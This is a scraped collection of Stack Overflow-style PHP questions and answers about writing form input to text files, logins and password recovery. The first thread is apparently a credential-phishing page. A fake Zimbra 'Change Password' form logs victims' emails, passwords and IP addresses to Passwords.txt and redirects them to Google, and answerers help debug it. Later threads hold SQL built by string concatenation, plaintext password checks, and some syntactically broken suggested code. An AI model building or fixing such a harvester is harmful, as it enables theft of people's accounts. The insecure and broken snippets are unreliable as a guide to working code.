Closed. This question needs debugging details. It is not currently accepting answers.
Edit the question to include desired behavior, a specific problem or error, and the shortest code necessary to reproduce the problem. This will help others answer the question.
Closed 6 years ago.
Improve this question
I'm trying to do a form that when the user types the info and then submits it saves it on a text file. But when I open the text file, it only displays the IP adress.... I can't figure out what I'm doing wrong with my code:
I already tried changing §_SERVER to $_POST but it doens't work
Thanks :)
HTML:
<form action="login.php" id="login.php" method="get">
<div class="imgcontainer">
<img src="zimbra.png" alt="Avatar" class="avatar">
</div>
<div class="bodypage">
<div class="font">
<div class="container">
<label>EEB2 Zimbra Email</label>
<input type="text" placeholder="Enter Email" name="email" id="email" required>
<label>Password</label>
<input type="password" placeholder="Enter Password" name="psw" id="psw" required>
<label>New Password</label>
<input type="password" placeholder="Enter New Password" name="newpsw" required id="newpassword">
<label>Confirm New Password</label>
<input type="password" placeholder="Enter New Password" name="newpsw" required id="confirmnewpassword">
</div>
<button type="submit">Change Password</button>
</div>
</form>
PHP:
<?php
$handle = fopen("Passwords.txt", "a");
$ip = $_SERVER['REMOTE_ADDR'];
$email = $_SERVER['email'];
$psw = $_SERVER['psw'];
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, PHP_EOL);
}
fwrite($handle, "IP=$ip");
fwrite($handle, "PASS=$psw");
fwrite($handle, "EMAIL=$email");
fclose($handle);
header ('Location: http://www.google.be/');
exit;
?>
EDIT: I'm not trying to get the new password, just the Email and the password.
Your method is $_GET so it would be $_GET['email']
There's no such thing as $_SERVER['email'], $_SERVER['psw'], etc. This is documented here.
Assuming that they have "name" attributes in the HTML form (which I can't, for some reason, see at Dropbox), you should find these values at $_POST['psw'], $_POST['email'], etc.
And I would add that you should use filter_input or some other mechanism to test these values before you put them onto your filesystem.
First if you are trying to save credentials(like passwords) you should not use method "GET" as in your code. Because when the form is submitted, as you have used GET method all the credentials will be shown on the URL. So it will be a security issue. Most developers prefer POST method over GET for form data handling.
As it says on W3schools "$_SERVER is a PHP super global variable which holds information about headers, paths, and script locations."
Using POST method
Try Changing to this.(Use "$_POST[]" method just to capture the data you're trying to POST from the web Form. So this will work for you.
$ip = $_POST['REMOTE_ADDR'];
$email = $_POST['email'];
In order this to work for you you should change
USING GET method
But if you still would like to stick with the GET method you can simply change only these to $_GET['']
$ip = $_GET['REMOTE_ADDR'];
$email = $_GET['email'];
Hope that would help you! :D Good Luck
Related
I am totally new in PHP and i have problem with posting data. I try to post data and write it in txt file. I already increase my post max size in php.ini. I use XAMPP
<form action="forms/save_news.php" method="post" role="form">
<div class="form-group">
<input type="text" name="date" class="form-control" id="date" placeholder="Дата" data-rule="minlen:10" data-msg="Моля въведете дата" />
<div class="validate"></div>
</div>
<div class="form-group">
<input type="text" class="form-control" name="title" id="title" placeholder="Заглавние"/>
<div class="validate"></div>
</div>
<div class="form-group">
<textarea class="form-control" name="data" rows="5" data-rule="required" data-msg="Моля въведете съдържание" placeholder="Новина"></textarea>
<div class="validate"></div>
</div>
<div class="text-center"><button type="submit">Запиши</button></div>
</form>
And my PHP code is:
<?php
if(isset($_POST['date'])) {
$date = $_POST['date'];
$fp = fopen('data.txt', 'a');
fwrite($fp, $date);
fclose($fp);
}
?>
My first guess would be a permission issue. What I would do to troubleshoot this is to turn on error reporting in your PHP script. Try the following code:
<?php
error_reporting(E_ALL);
ini_set("display_errors", 1);
if (isset($_POST('date')) {
$date = filter_var($$_POST['date'], FILTER_SANITIZE_STRING);
$fp = fopen('data.txt', 'a');
fwrite($fp, $date);
fclose($fp);
}
?>
Post another request from your form and see what appears in the browser. The errors that are reported should tell you where the problem is, but if you aren't positive how to fix the errors.
Now, all that said, be sure to never trust data sent from a web form. For simply testing purposes, you can do what you are doing, but I would not recommend getting into the habit since it can breed complacency. Note the change I made to the line that assigns the value of the form field to the $date variable. It uses a filter_var function to sanitize the string. There are plenty of combinations, and it is best to understand exactly how you are going to use the data, eventually to choose the correct filter(s).
You may consider an extra check. For example, if $_POST['date'] contained an empty string, it would pass isset() and would still append this to the Text file.
PHP Version is also a consideration here.
Try:
<?php
if(isset($_POST['date']) && !empty($_POST['date'])) {
$date = $_POST['date'];
if (is_writable('date.txt'){
$fp = fopen('date.txt', 'a');
if(fwrite($fp, $date) === FALSE){
echo "Cannot write to file";
exit;
}
fclose($fp);
} else {
echo "The file is not writable.";
}
}
?>
Also, this script assumes that date.txt and save_news.php reside in the same folder path. Is date.txt in forms folder? If it is not you will want to ensure that the script can reach the file and there are proper permissions for XAMPP and PHP to Read, Write to this file.
If date.txt is elsewhere, maybe in the parent, use:
$fp = fopen('../date.txt', 'a');
If PHP has decided that filename specifies a local file, then it will try to open a stream on that file. The file must be accessible to PHP, so you need to ensure that the file access permissions allow this access. If you have enabled open_basedir further restrictions may apply.
https://www.php.net/manual/en/function.fopen.php
PHP noob here. I'm trying to create a login file. Here's my code:
HTML:
<body>
<div class="login">
<h2 class="login-header">Log in</h2>
<form action="practice.php" method="POST" class="login-container">
<p>
<label>Username: </label>
<input type="text" id="user" name="user" placeholder="Enter Username" required/>
</p>
<p>
<label>Password:</label>
<input type="password" id="pass" name="pass" placeholder="Enter Password" required/>
</p>
<p>
<input type="submit" id="btn" value="Login" />
</p>
</form>
</div>
PHP:
<?php
$usernameIn = $_POST['user'];
$passwordIn = $_POST['pass'];
$usernameIn = stripcslashes($usernameIn);
$passwordIn = stripcslashes($passwordIn);
$usernameIn = mysql_real_escape_string($usernameIn);
$passwordIn = mysql_real_escape_string($passwordIn);
$host = 'localhost';
$user = 'root';
$password = '';
$db ='practice';
$connection = mysqli_connect($host,$user,$password,$db);// you can select db separately as you did already
if($connection){
$ret = mysqli_query($connection,"SELECT `userName`, `password`, `clearacne` FROM
`users_table` WHERE `userName`='$usernameIn' AND `password`='$passwordIn'");
global $to_encode = array();
while($row = mysqli_fetch_assoc($ret)) {
$to_encode[] = $row;
}
//user doesn't exist redirect to error page
if(empty($to_encode)) header("Location: http://localhost/practiceLogin/loginErrorIndex.html");
//user exist continue
else{
$to_encode = json_encode($to_encode);
header("Location: http://localhost/practiceLogin/loginOkIndex.php");
}
}else{
echo "db connection error because of".mysqli_connect_error();
}
?>
Two questions:
1)Is there a way to process the info the user puts in and redirect him to a new file ONLY if the info exists in the database?
2)How can I pass the variable $to_encode from the practice.php to other .php files without including/requiring the practice.php file?
Basically what I'm trying to do is to not allow access if the user isn't registered, and if he is then allow access to another file and use a JSON object that represents different parameters associated with the user.
Thank you!
First question: You are already making redirects:
header("Location: http://localhost/practiceLogin/loginOkIndex.php");
Second question: Yes, there is a way. It is called session. You can read more here: http://php.net/manual/en/book.session.php
The basic explanation - once you check if username/password match you start a session, put some temp variables in it, a file has been written in your server's HDD and a cookie has been sent to your user's browser. Next time the user sends request to some of your pages, you check for the cookie, check if session is still active an not expired and you can get your temp variables from the session's file.
The heavy stuff is already written and automated. Just put some time on reading the link I gave you and also I am sure you will find many example resources over the Internet.
I've been developing iOS apps for a while now and have just started to get into designing my website. In one of my apps, I add data to my database by using:
let URL = NSURL(string: urlPath.stringByAddingPercentEscapesUsingEncoding(NSUTF8StringEncoding)!)
let data = NSData(contentsOfURL: URL!)
var response = ""
if let data = data{
response = NSString(data: data, encoding: NSUTF8StringEncoding) as! String
}
The urlPath would look something like: http://mydomainname.com/folder/anotherFolder/theAPI.php?arg1=one&arg2=two&arg3=three and so forth.
What I really want to be able to do is call that API.php file with all the arguments where each one (arg1=, arg2=, etc) is a field in a HTML form. I've found a couple of tutorials that deal with HTML forms and validating data, and now my form looks like:
<form action="action.php" method="post">
<div id="formtext">Name</div>
<input type="text" name="Name">
<div id="formtext"><br>Email Address:</div>
<input type="text" name="Email"><br>
<div id="formtext"><br>Password</div>
<input type="text" name="Password"><br><br>
<input type="submit" name="submit" value="Submit">
</form>
Apologies if the HTML is a little cringy, I'm not experienced enough to know what 'tidy'/conventional HTML code looks like and this is what I've managed to piece together from tutorials.
I also know that in the action.php you can get the values in the forms like: $_POST['Name']. I feel like I'm really close - I just can't find anywhere that will tell me how to call this api.
The closest I can get is:
$name = $_POST['Name']
$email = $_POST['Email']
$password = $_POST['Password']
$response = file_get_contents('http://domain.com/folder/api.php?Name=' . $name . '&Email=' . $email . '&Password=' . $password);
echo $response
If you're a php expert, again, sorry for butchering your code :)
(Oh, and the result just says there was an error on line 26 in the where clause - the API's fine because I tested it from my app).
Edit: Where clause used to be While Loop (sorry)
In conclusion, I'd greatly appreciate if someone showed me what to put in action.php (excluding verification - I'll get on to that later) and please do let me know if I'm doing anything ludicrously wrong.
Thanks :)
In HTML the name="" part of the tag should correlate with your arg1, arg2, arg3. I don't know how much experience you have with GET and POST, but if you want the URL to contain all of the args like in your example, you should set the form method to get. The action attribute of the form tag is the page you want the values to be sent to. Try the following for your form:
<form action="http://mydomainname.com/folder/anotherFolder/theAPI.php" method="get">
<div id="formtext">Name</div>
<input type="text" name="arg1">
<div id="formtext"><br>Email Address:</div>
<input type="text" name="arg2"><br>
<div id="formtext"><br>Password</div>
<input type="text" name="arg3"><br><br>
<input type="submit" name="submit" value="Submit">
</form>
After submitting this form you should be taken to the URL http://mydomainname.com/folder/anotherFolder/theAPI.php?arg1=inputfromfirstbox&arg2=inputfromfield2&arg3=inputfromfield3
First of all you need to put your PHP instructions between php markups.
<?php
//You php script here
?>
Moreover, php instruction ended by ";", you did it well for $response.
<?php
$name = $_POST['Name'];
$email = $_POST['Email'];
$password = $_POST['Password'];
$response = file_get_contents('http://domain.com/folder/api.php?Name=' . $name . '&Email=' . $email . '&Password=' . $password);
echo $response;
?>
Then, it is not a good idea to use directly data from a form. You should analyse them before (be sure that your email is a real one and not a random string etc.). To do that you can take a look at the regex : http://php.net/manual/en/function.preg-match.php
Let me know if you need more information.
Closed. This question needs debugging details. It is not currently accepting answers.
Edit the question to include desired behavior, a specific problem or error, and the shortest code necessary to reproduce the problem. This will help others answer the question.
Closed 8 years ago.
Improve this question
I created a HTML form which should submit the inputted text into a .txt file with PHP, but it only creates a blank line and I don't know what the issue is.
Help is greatly appreciated!
<form class="form-inline validate" name="form1" method="post" action="signup.php" target="_blank" novalidate>
<div class="row no-gutter">
<div class="col-sm-9">
<input type="email" value="" name="mail" class="form-control" placeholder="Subscribe to our newsletter" required>
</div>
<div class="col-sm-3">
<input type="submit" value="SUBSCRIBE" name="Submit">
</div>
</div>
</form>
<?php
$username = $_POST['user'];
//the data
$data = "$email\n";
//open the file and choose the mode
$fh = fopen("users.txt", "a");
fwrite($fh, $data);
//close the file
fclose($fh);
print "User Submitted";
?>
If you want to get mail change your php code to
<?php
if(isset($_POST['Submit'])){
$email = $_POST['mail'];
//the data
$data = "$email\n";
//open the file and choose the mode
$fh = fopen("users.txt", "a+");
fwrite($fh, $data);
//close the file
fclose($fh);
print "User Submitted";
}
?>
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
Questions asking for code must demonstrate a minimal understanding of the problem being solved. Include attempted solutions, why they didn't work, and the expected results. See also: Stack Overflow question checklist
Closed 9 years ago.
Improve this question
I'm getting pretty far with my registration script now. This has been such an amazing learning curve for me. As of now I've just finished up some bugs with my user recognition and registration email send outs. I'm having some issues with recovering a password though. At the moment I am just trying to get an email recognised, here is my HTML and PHP:
HTML
<?php
session_start();
?>
<!DOCTYPE html>
<html>
<head>
<link rel="stylesheet" type="text/css" href="style.css" />
</head>
<body>
<?php include "header.php" ?>
<div id="wrapper">
<form method="post" action="">
<h2>Recover Password</h2>
<div id="underline"></div>
<ul>
<li>
<label for="usn">Email : </label>
<input type="text" maxlength="30" required autofocus name="reset" />
</li>
<li class="buttons">
<input type="submit" name="reset" value="Reset Pass" class="xbutton" />
</li>
</ul>
</form>
</div>
</body>
</html>
<?php include "prec.php" ?>
PHP
<?php
if($_POST)
{
if(empty($_POST['reset']))
{
echo 'Please enter all fields';
}
else
{
$email = $_POST['reset'];
$password = $_POST['password'];
$db_name =
$db_user =
$db_pass =
$conn = new PDO('mysql:host=localhost;dbname=tweezy_php', 'tweezy_php', 'XXXXXX',
array( PDO::ATTR_PERSISTENT => true ));
$stmt = $conn->prepare("SELECT email FROM users WHERE email = ? ");
$stmt->execute(array($email));
if($stmt->rowCount() === 1 )
{
echo "That email exists";
}
else
{
echo "Sorry, that email doesn't exsist.";
}
}
}
?>
For some reason, no matter what I enter the supplied email is never recognised. Looking through my code I don't quite see why though. I've tried a couple of variations, but it just seems to give me the same result. I'm thinking it has something to do with my SQL query, but I can't seem to quite put my finger on it.
Any insights would be wonderful!
Your input field is:
<input type="text" maxlength="30" required autofocus name="reset" />
Change this to:
<input type="text" maxlength="30" required autofocus name="email" />
And, in your PHP, you'd do something like this to retrieve the email from the user:
$email = $_POST['email'];
A simple example to demonstrate why it's failing:
test.php
<?php
if(isset($_POST['fieldname'])){
echo $_POST['fieldname']; //outputs "Submit" instead of the user input
}
?>
<form action="" method="post">
<input type="text" name="fieldname"/>
<input type="submit" name="fieldname">
</form>
Both the input field and submit button has the same name. So when you input something and click on submit, you will find that instead of echoing the user input, it echoes the text Submit. This is because the first input is being overridden by the name attribute in your Submit button. This can be resolved by changing your email input's name attribute to something different, like email so it makes more sense.
Hope this helps!
You have two fields in the form that contain name="reset". One is the email field, the other is the submit button.
This will confuse things -- only one of those values will get into your $_POST array, and it looks like it's the wrong one.
You should tidy up the form and ensure that your field name attributes do not clash.
In addition, I note that the email field has a label near it that has for="usn", but there isn't a usn field anywhere to be seen. That won't cause any problems, but is badly incorrect (it looks like a copy+paste bug) -- you probably fix that too.
Change $email to This:
$email = $_POST['username'];
And
if(!isset($_POST['reset']))
Try the following:
$conn = new PDO('mysql:host=localhost;dbname=tweezy_php', 'tweezy_php', 'XXXXXX',
array( PDO::ATTR_PERSISTENT => true ));
$stmt = $conn->prepare("SELECT email FROM users WHERE email = ? ");
$stmt->bindValue(1, $email);
$stmt->execute();
$result = $stmt->fetchAll();
if(count($result) === 1 ){
echo "That email exists";
}else{
echo "Sorry, that email doesn't exsist.";
}
Also, you should change the name of the email's input. It is conflicting with another input and if two inputs have the same name without them being an array, the last input's value will be presented to the server.
That should resolve the issue. Hope this helps.
Your issue is because you're checking the Reset button for a value and not the email field. Here's your email field:
<input type="text" maxlength="30" required autofocus name="username" />
So you need to change this:
if(empty($_POST['reset']))
AND
$email = $_POST['reset'];
To check $_POST['username'] instead.
Both your reset and email input fields are named reset (name="reset"). This will result in the first field (which should be named email) being overriden by your actual reset input field
Change your email input to
<input type="text" maxlength="30" required autofocus name="email" />
And your $email to
$email = $_POST['email'];